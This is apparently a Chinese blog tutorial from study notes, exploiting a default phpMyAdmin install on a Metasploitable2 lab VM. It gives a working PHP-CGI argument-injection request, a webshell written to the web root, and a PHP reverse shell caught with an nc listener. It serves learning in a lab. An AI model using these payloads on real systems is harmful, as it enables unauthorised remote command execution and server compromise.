手动漏洞挖掘 phpMyAdmin默认安装

手动漏洞挖掘(一)

学习web渗透过程中的心得体会以及知识点的整理,方便我自己查找,也希望可以和大家一起交流。

—— phpMyAdmin默认安装漏洞——

需要的工具:

  1. burpsuit
  2. 靶机(我选择的是Metasploitable2)

phpMyAdmin漏洞
安装在web服务器中的web接口,专门用来管理MySQL数据库。对于早期版本,安装后若是没有做安全配置,对敏感路径进行删除,则有可能留下安全隐患,其中最明显的为setup。
1.我们可以探索PHP网站(可根据banner等信息判断)的phpmyadmin目录是否可以访问(扫描工具/手动爬网)
2.可以尝试../phpMyAdmin/setup目录是否可以访问【可以不需要身份认证的情况下,对服务器进行配置】

一.利用漏洞重放数据

首先在burpsuite的Repeater输入以下代码:

    POST 
    http://192.168.52.130/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1
    Host: 192.168.20.10
     
    <?php
    passthru('id');
    die(); 
    ?>

代码的意思是

?-d+allow_url_include%3d1±d
+auto_prepend_file%3dphp://input HTTP/1.1
“?”后面代码含义:PHP的主配置文件.ini进行修改
allow_url_include: 对服务器上的其它文件进行引用
auto_prepend_file: 附加文件
passthru(‘id’): 括号内为系统操作指令
【注意】Host头是必须的,但是里面的内容任意,可以是正常的ip。也可以是123这种。

而后在右上角(如图所示)填入攻击地址

在这里插入图片描述

在这里插入图片描述

接着点击“Go”,攻击就开始进行了,结果会在右边界面显示,如果显示“200 OK”,即为攻击成功,如图:
在这里插入图片描述

接着你可以更改passthru命令die命令,以获得更多的信息,如果找不到命令,可以使用whereis 查找,例如:ifconfig
在这里插入图片描述

例如可以尝试写入权限:
在这里插入图片描述

二.制作并传送简单的webshell
首先我们制作简单的webshell

<?php
\$cmd = \$_GET["cmd"];
system(\$cmd);
在这里插入图片描述

接着我们写入webshell

<?php
passthru('echo "<?php \$cmd = \$_GET["cmd"];system(\$cmd);?>" > /var/www/a.php');
passthru('cat /var/www/a.php');
die();
?>

代码中的“\”是用来转译,防止将“$”后字符被转译,这样将php代码保存到服务器的Web根目录中从而能够通过访问该目录的文件来实现输入命令,缺点是在服务器中生成一个文件,容易被管理员发现。


在这里插入图片描述

然后就可以访问并查看验证这个木马了:


在这里插入图片描述

直接访问我们新建的文件是看不到的,会报错,system函数没有什么可以执行的,我们需要再来点什么
在这里插入图片描述

cmd=的后面的命令可以更改为其他命令。验证成功。
但是多了个文件,终归是容易被发现的,所以可不可以不产生新文件呢?可以。

四.php反弹shell
kali为我们准备了现成的反弹shell的PHP文件,地址位于:

/usr/share/webshells/php/php-reverse-shell.php

我们把它拷贝出来,我将它重命名为123.php

cp /usr/share/webshells/php/php-reverse-shell.php ./123.php

同时我们要对它进行修改,我们需要配置他的反弹目标,即接受信息的本地ip地址,我们输入命令:

vi 123.php

进入文件后,大约在文件中部,会有配置ip的地方,填入本机ip和侦听端口:

在这里插入图片描述

保存并退出后,然后打开文件,复制全部内容粘贴到burpsuite:
在这里插入图片描述

在这里插入图片描述

同时我们开启侦听端口,输入代码:nc -nvvlp 1234

在这里插入图片描述

接着攻击目标


在这里插入图片描述

我们并没有生成新文件,隐蔽性更好,成功后可以使用nc直接操作,如图:


在这里插入图片描述

接着,我们想要查看服务器的ip,但是返回时并没有这个指令,问题出在,

我们利用这个方法所获得的账号依旧是访问的账号,权限一样,并且作为访问账号,有可能缺少环境变量,这就导致这个账号并不知道ifconfig命令是什么,

这个时候我们可以尝试使用 whereis命令,如图:


在这里插入图片描述

好的,我们知道了ifconfig命令在sbin目录下,我们尝试进入到sbin目录(有可能失败有可能成功),成功后,使用ifconfig命令,可以查看到服务器的ip地址等一系列信息了。


在这里插入图片描述
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 215,384评论 6 497
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 91,845评论 3 391
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 161,148评论 0 351
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 57,640评论 1 290
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,731评论 6 388
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,712评论 1 294
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,703评论 3 415
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,473评论 0 270
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,915评论 1 307
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,227评论 2 331
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,384评论 1 345
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,063评论 5 340
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,706评论 3 324
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,302评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,531评论 1 268
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,321评论 2 368
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,248评论 2 352

推荐阅读更多精彩内容